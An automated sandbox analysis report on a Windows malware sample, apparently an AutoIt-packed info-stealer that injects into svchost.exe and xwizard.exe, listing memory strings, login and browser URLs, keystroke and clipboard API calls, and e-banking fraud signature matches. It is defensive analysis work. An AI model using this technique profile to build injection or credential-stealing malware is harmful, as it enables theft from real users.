                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yinhuzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yopaizhibo.net/binding
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yourdegree.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yuguozhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yutongzhibo.com
                Source: bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.ziyuzhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zootech.net
                Source: xwizard.exe, 00000009.00000002.3092380955.000000000812E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
                Source: xwizard.exe, 00000009.00000002.3092380955.000000000812E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: xwizard.exe, 00000009.00000002.3092380955.000000000812E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: xwizard.exe, 00000009.00000002.3092380955.000000000812E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: bIMhSmtZ.exe, 0000000A.00000002.3090251513.0000000004288000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: xwizard.exe, 00000009.00000002.3092380955.000000000812E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: xwizard.exe, 00000009.00000002.3092380955.000000000812E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: xwizard.exe, 00000009.00000002.3092380955.000000000812E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
                Source: xwizard.exe, 00000009.00000002.3092380955.000000000812E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
                Source: xwizard.exe, 00000009.00000002.3089303575.0000000003385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: xwizard.exe, 00000009.00000002.3089303575.0000000003363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: xwizard.exe, 00000009.00000003.1647153226.0000000008106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: xwizard.exe, 00000009.00000002.3089303575.0000000003385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: xwizard.exe, 00000009.00000002.3089303575.0000000003385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: xwizard.exe, 00000009.00000002.3089303575.0000000003363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: xwizard.exe, 00000009.00000002.3089303575.0000000003385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: xwizard.exe, 00000009.00000002.3089303575.0000000003363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://push.zhanzhang.baidu.com/push.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://white.anva.org.cn/
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.12377.cn/
                Source: xwizard.exe, 00000009.00000002.3092380955.000000000812E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: xwizard.exe, 00000009.00000002.3092380955.000000000812E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zzlz.gsxt.gov.cn/
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006A425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_006A425A
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006A4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_006A4458
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006A425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_006A425A
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00690219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00690219
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006BCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_006BCDAC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3088675987.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3089017853.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3090221719.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3091843748.0000000005320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1464158922.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3089095776.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1463500650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1463772333.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: This is a third-party compiled AutoIt script.0_2_00633B4C
                Source: 1YDqrpKZwA.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 1YDqrpKZwA.exe, 00000000.00000002.1252959619.00000000006E5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6df1b1d7-7
                Source: 1YDqrpKZwA.exe, 00000000.00000002.1252959619.00000000006E5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6c2692d3-1
                Source: 1YDqrpKZwA.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4d130631-6
                Source: 1YDqrpKZwA.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_72f6c8dc-0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C9D3 NtClose,2_2_0042C9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B60 NtClose,LdrInitializeThunk,2_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk,2_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674340 NtSetContextThread,2_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674650 NtSuspendThread,2_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BE0 NtQueryValueKey,2_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BF0 NtAllocateVirtualMemory,2_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BA0 NtEnumerateValueKey,2_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B80 NtQueryInformationFile,2_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AF0 NtWriteFile,2_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AD0 NtReadFile,2_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AB0 NtWaitForSingleObject,2_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F60 NtCreateProcessEx,2_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F30 NtCreateSection,2_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FE0 NtCreateFile,2_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FA0 NtQuerySection,2_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FB0 NtResumeThread,2_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F90 NtProtectVirtualMemory,2_2_03672F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E30 NtWriteVirtualMemory,2_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EE0 NtQueueApcThread,2_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EA0 NtAdjustPrivilegesToken,2_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E80 NtReadVirtualMemory,2_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D30 NtUnmapViewOfSection,2_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D00 NtSetInformationFile,2_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D10 NtMapViewOfSection,2_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DD0 NtDelayExecution,2_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DB0 NtEnumerateKey,2_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C60 NtCreateKey,2_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C70 NtFreeVirtualMemory,2_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C00 NtQueryInformationProcess,2_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CF0 NtOpenProcess,2_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CC0 NtQueryVirtualMemory,2_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CA0 NtQueryInformationToken,2_2_03672CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673010 NtOpenDirectoryObject,2_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673090 NtSetValueKey,2_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036739B0 NtGetContextThread,2_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D70 NtOpenThread,2_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D10 NtOpenProcessToken,2_2_03673D10
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB4650 NtSuspendThread,LdrInitializeThunk,9_2_04FB4650
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB4340 NtSetContextThread,LdrInitializeThunk,9_2_04FB4340
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_04FB2CA0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_04FB2C70
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2C60 NtCreateKey,LdrInitializeThunk,9_2_04FB2C60
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_04FB2DF0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2DD0 NtDelayExecution,LdrInitializeThunk,9_2_04FB2DD0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_04FB2D30
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2D10 NtMapViewOfSection,LdrInitializeThunk,9_2_04FB2D10
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2EE0 NtQueueApcThread,LdrInitializeThunk,9_2_04FB2EE0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_04FB2E80
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2FE0 NtCreateFile,LdrInitializeThunk,9_2_04FB2FE0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2FB0 NtResumeThread,LdrInitializeThunk,9_2_04FB2FB0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2F30 NtCreateSection,LdrInitializeThunk,9_2_04FB2F30
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2AF0 NtWriteFile,LdrInitializeThunk,9_2_04FB2AF0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2AD0 NtReadFile,LdrInitializeThunk,9_2_04FB2AD0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_04FB2BF0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2BE0 NtQueryValueKey,LdrInitializeThunk,9_2_04FB2BE0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_04FB2BA0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2B60 NtClose,LdrInitializeThunk,9_2_04FB2B60
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB35C0 NtCreateMutant,LdrInitializeThunk,9_2_04FB35C0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB39B0 NtGetContextThread,LdrInitializeThunk,9_2_04FB39B0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2CF0 NtOpenProcess,9_2_04FB2CF0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2CC0 NtQueryVirtualMemory,9_2_04FB2CC0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2C00 NtQueryInformationProcess,9_2_04FB2C00
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2DB0 NtEnumerateKey,9_2_04FB2DB0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2D00 NtSetInformationFile,9_2_04FB2D00
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2EA0 NtAdjustPrivilegesToken,9_2_04FB2EA0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2E30 NtWriteVirtualMemory,9_2_04FB2E30
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2FA0 NtQuerySection,9_2_04FB2FA0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2F90 NtProtectVirtualMemory,9_2_04FB2F90
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2F60 NtCreateProcessEx,9_2_04FB2F60
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2AB0 NtWaitForSingleObject,9_2_04FB2AB0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB2B80 NtQueryInformationFile,9_2_04FB2B80
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB3090 NtSetValueKey,9_2_04FB3090
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB3010 NtOpenDirectoryObject,9_2_04FB3010
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB3D70 NtOpenThread,9_2_04FB3D70
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB3D10 NtOpenProcessToken,9_2_04FB3D10
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CD9170 NtCreateFile,9_2_00CD9170
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CD92E0 NtReadFile,9_2_00CD92E0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CD93D0 NtDeleteFile,9_2_00CD93D0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CD9480 NtClose,9_2_00CD9480
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CD95E0 NtAllocateVirtualMemory,9_2_00CD95E0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04CDFB06 NtResumeThread,9_2_04CDFB06
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00694021: CreateFileW,DeviceIoControl,CloseHandle,0_2_00694021
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00688858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00688858
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0069545F
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0063E8000_2_0063E800
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0065DBB50_2_0065DBB5
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0063FE400_2_0063FE40
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0063E0600_2_0063E060
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006B804A0_2_006B804A
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006441400_2_00644140
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006524050_2_00652405
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006665220_2_00666522
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006B06650_2_006B0665
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0066267E0_2_0066267E
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006468430_2_00646843
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0065283A0_2_0065283A
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006689DF0_2_006689DF
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00648A0E0_2_00648A0E
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006B0AE20_2_006B0AE2
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00666A940_2_00666A94
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0068EB070_2_0068EB07
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00698B130_2_00698B13
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0065CD610_2_0065CD61
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006670060_2_00667006
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0064710E0_2_0064710E
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006431900_2_00643190
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006312870_2_00631287
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006533C70_2_006533C7
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0065F4190_2_0065F419
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006516C40_2_006516C4
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006456800_2_00645680
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006458C00_2_006458C0
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006578D30_2_006578D3
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00651BB80_2_00651BB8
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00669D050_2_00669D05
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0065BFE60_2_0065BFE6
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00651FD00_2_00651FD0
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_034B35F00_2_034B35F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004188E32_2_004188E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010C02_2_004010C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004048C62_2_004048C6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100E32_2_004100E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010BA2_2_004010BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029E02_2_004029E0
